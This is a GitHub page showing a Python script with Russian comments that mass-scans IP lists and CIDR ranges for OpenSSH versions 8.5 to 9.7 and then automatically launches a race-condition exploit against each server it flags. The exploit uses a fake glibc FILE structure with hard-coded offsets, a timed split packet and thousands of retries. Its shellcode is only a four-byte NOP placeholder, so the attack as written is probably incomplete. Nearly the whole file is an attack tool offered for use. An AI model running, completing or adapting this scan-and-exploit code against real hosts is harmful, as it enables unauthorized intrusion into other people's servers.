-
Notifications
You must be signed in to change notification settings - Fork 1
/
main.py
269 lines (237 loc) · 11.6 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
import socket
import struct
import argparse
import ipaddress
import threading
from queue import Queue
import time
# адреса памяти glibc для эксплуатации
POSSIBLE_GLIBC_BASES = [0xb7200000, 0xb7400000]
# Шеллкод для инъекции
EXPLOIT_PAYLOAD = b"\x90\x90\x90\x90"
MAX_EXPLOIT_ATTEMPTS = 20000
DELAY_BETWEEN_ATTEMPTS = 0.1 # 100ms
MAX_BUFFER_SIZE = 1024
# Создание TCP-соединения с указанным IP-адресом и портом
def create_tcp_connection(target_ip, target_port):
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.setblocking(0)
client_socket.connect_ex((target_ip, target_port))
return client_socket
# Отправка пакета определенного типа и содержания
def transmit_packet(client_socket, packet_type, content):
packet_length = len(content) + 5
packet = struct.pack('>I', packet_length) + struct.pack('B', packet_type) + content
client_socket.sendall(packet)
# Отправка версии SSH клиента на сервер
def initiate_ssh_protocol(client_socket):
ssh_version_message = b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n"
client_socket.sendall(ssh_version_message)
# Получение версии SSH сервера
def receive_server_ssh_version(client_socket):
while True:
try:
server_response = client_socket.recv(256)
if server_response:
print(f"Получена версия SSH сервера: {server_response.decode()}")
break
except BlockingIOError:
time.sleep(0.1)
# Отправка начального пакета для инициализации обмена ключами
def send_kexinit_packet(client_socket):
kexinit_data = b"\x00" * 36
transmit_packet(client_socket, 20, kexinit_data)
# Получение пакета KEX_INIT от сервера
def receive_kexinit_packet(client_socket):
while True:
try:
response = client_socket.recv(MAX_BUFFER_SIZE)
if response:
print(f"Получен пакет KEX_INIT ({len(response)} байт)")
break
except BlockingIOError:
time.sleep(0.1)
# Выполнение последовательности обмена сообщениями для SSH рукопожатия
def execute_ssh_handshake(client_socket):
initiate_ssh_protocol(client_socket)
receive_server_ssh_version(client_socket)
send_kexinit_packet(client_socket)
receive_kexinit_packet(client_socket)
# Создание поддельной структуры файла для эксплуатации уязвимости
def construct_fake_file_structure(buffer, glibc_base_addr):
fake_file_data = struct.pack('<QQQQQQQQQQQQQQQ', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x61)
vtable_ptr = struct.pack('<Q', glibc_base_addr + 0x21b740)
codecvt_ptr = struct.pack('<Q', glibc_base_addr + 0x21d7f8)
buffer[:len(fake_file_data)] = fake_file_data
buffer[-16:] = vtable_ptr + codecvt_ptr
# Попытка эксплуатации уязвимости с помощью условия гонки
def exploit_race_condition(client_socket, processing_delay, glibc_base_addr):
malicious_packet = bytearray(MAX_BUFFER_SIZE)
construct_fake_file_structure(malicious_packet, glibc_base_addr)
malicious_packet[:len(EXPLOIT_PAYLOAD)] = EXPLOIT_PAYLOAD
client_socket.sendall(malicious_packet[:-1])
time.sleep(processing_delay - 0.001)
client_socket.sendall(malicious_packet[-1:])
try:
server_response = client_socket.recv(MAX_BUFFER_SIZE)
if server_response:
print(f"Получен ответ после попытки эксплуатации ({len(server_response)} байт)")
return True
except BlockingIOError:
return False
return False
# функция для выполнения эксплуатации на указанной цели
def initiate_exploit(target_ip, target_port):
exploit_success = False
for glibc_base in POSSIBLE_GLIBC_BASES:
print(f"Пытаемся провести эксплуатацию с базой glibc: 0x{glibc_base:x}")
for attempt in range(MAX_EXPLOIT_ATTEMPTS):
if attempt % 1000 == 0:
print(f"Попытка {attempt} из {MAX_EXPLOIT_ATTEMPTS}")
try:
client_socket = create_tcp_connection(target_ip, target_port)
execute_ssh_handshake(client_socket)
processing_delay = 0.5
if exploit_race_condition(client_socket, processing_delay, glibc_base):
print(f"Возможный успех эксплуатации на попытке {attempt} с базой glibc 0x{glibc_base:x}!")
exploit_success = True
break
except Exception as error:
print(f"Ошибка на попытке {attempt}: {error}")
finally:
client_socket.close()
time.sleep(DELAY_BETWEEN_ATTEMPTS)
if exploit_success:
break
return exploit_success
# Создание SSH-соединения и возврат сокета
def retrieve_ssh_connection(target_ip, target_port, timeout_duration):
ssh_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssh_socket.settimeout(timeout_duration)
try:
ssh_socket.connect((target_ip, target_port))
return ssh_socket
except:
return None
# Получение баннера SSH сервера
def fetch_ssh_banner(ssh_socket):
try:
banner_info = ssh_socket.recv(MAX_BUFFER_SIZE).decode().strip()
ssh_socket.close()
return banner_info
except Exception as error:
return str(error)
# Проверка уязвимости сервера по версии SSH
def validate_vulnerability(target_ip, target_port, timeout_duration, result_queue):
ssh_socket = retrieve_ssh_connection(target_ip, target_port, timeout_duration)
if not ssh_socket:
result_queue.put((target_ip, target_port, 'closed', "Порт закрыт"))
return
banner = fetch_ssh_banner(ssh_socket)
if "SSH-2.0-OpenSSH" not in banner:
result_queue.put((target_ip, target_port, 'failed', f"Не удалось получить баннер SSH: {banner}"))
return
vulnerable_ssh_versions = [
'SSH-2.0-OpenSSH_8.5',
'SSH-2.0-OpenSSH_8.6',
'SSH-2.0-OpenSSH_8.7',
'SSH-2.0-OpenSSH_8.8',
'SSH-2.0-OpenSSH_8.9',
'SSH-2.0-OpenSSH_9.0',
'SSH-2.0-OpenSSH_9.1',
'SSH-2.0-OpenSSH_9.2',
'SSH-2.0-OpenSSH_9.3',
'SSH-2.0-OpenSSH_9.4',
'SSH-2.0-OpenSSH_9.5',
'SSH-2.0-OpenSSH_9.6',
'SSH-2.0-OpenSSH_9.7'
]
excluded_versions = [
'SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10',
'SSH-2.0-OpenSSH_9.3p1 Ubuntu-3ubuntu3.6',
'SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.3',
'SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u3',
'SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3'
]
if any(version in banner for version in vulnerable_ssh_versions) and banner not in excluded_versions:
result_queue.put((target_ip, target_port, 'vulnerable', f"(запущен {banner})"))
else:
result_queue.put((target_ip, target_port, 'not_vulnerable', f"(запущен {banner})"))
# Чтение IP-адресов из файла.
def process_ip_targets(ip_list_filepath):
ip_addresses = []
try:
with open(ip_list_filepath, 'r') as ip_file:
ip_addresses.extend(ip_file.readlines())
except IOError:
print(f"❌ [-] Не удалось прочитать файл: {ip_list_filepath}")
return [ip.strip() for ip in ip_addresses]
def main():
parser = argparse.ArgumentParser(description="Проверка серверов на уязвимые версии OpenSSH и попытка эксплуатации.")
parser.add_argument("targets", nargs='*', help="IP-адреса, доменные имена, файлы с IP-адресами или CIDR-диапазоны.")
parser.add_argument("--port", type=int, default=22, help="Номер порта для проверки (по умолчанию: 22).")
parser.add_argument("-t", "--timeout", type=float, default=1.0, help="Таймаут соединения в секундах (по умолчанию: 1 секунда).")
parser.add_argument("-l", "--list", help="Файл со списком IP-адресов для проверки.")
args = parser.parse_args()
targets = args.targets
port = args.port
timeout = args.timeout
ip_list = []
if args.list:
ip_list.extend(process_ip_targets(args.list))
for target in targets:
try:
with open(target, 'r') as ip_file:
ip_list.extend(ip_file.readlines())
except IOError:
if '/' in target:
try:
network = ipaddress.ip_network(target, strict=False)
ip_list.extend([str(ip) for ip in network.hosts()])
except ValueError:
print(f"❌ [-] Неправильная CIDR нотация: {target}")
else:
ip_list.append(target)
result_queue = Queue()
threads = []
# Запуск потоков для проверки уязвимости серверов
for ip in ip_list:
ip = ip.strip()
thread = threading.Thread(target=validate_vulnerability, args=(ip, port, timeout, result_queue))
thread.start()
threads.append(thread)
# Ожидание завершения потоков
for thread in threads:
thread.join()
total_scanned = len(ip_list)
closed_ports_count = 0
non_vulnerable_servers = []
vulnerable_servers = []
# Обработка результатов сканирования
while not result_queue.empty():
ip, port, status, message = result_queue.get()
if status == 'closed':
closed_ports_count += 1
elif status == 'vulnerable':
vulnerable_servers.append((ip, message))
elif status == 'not_vulnerable':
non_vulnerable_servers.append((ip, message))
else:
print(f"⚠️ [!] Сервер на {ip}:{port} - {message}")
print(f"\n🛡️ Серверов не уязвимы: {len(non_vulnerable_servers)}\n")
for ip, msg in non_vulnerable_servers:
print(f" [+] Сервер на {ip} {msg}")
print(f"\n🚨 Серверов вероятно уязвимы: {len(vulnerable_servers)}\n")
for ip, msg in vulnerable_servers:
print(f" [+] Сервер на {ip} {msg}")
print(f"\n🔒 Серверов с закрытым портом {port}: {closed_ports_count}")
print(f"\n📊 Всего проверено целей: {total_scanned}\n")
print("\n\nНачинаем эксплуатацию...\n")
for ip, _ in vulnerable_servers:
success = initiate_exploit(ip, port)
if success:
print(f"\n[!] Эксплуатация сервера на {ip} прошла успешно!\n")
else:
print(f"\n[!] Попытка эксплуатации сервера на {ip} не удалась\n")
if __name__ == "__main__":
main()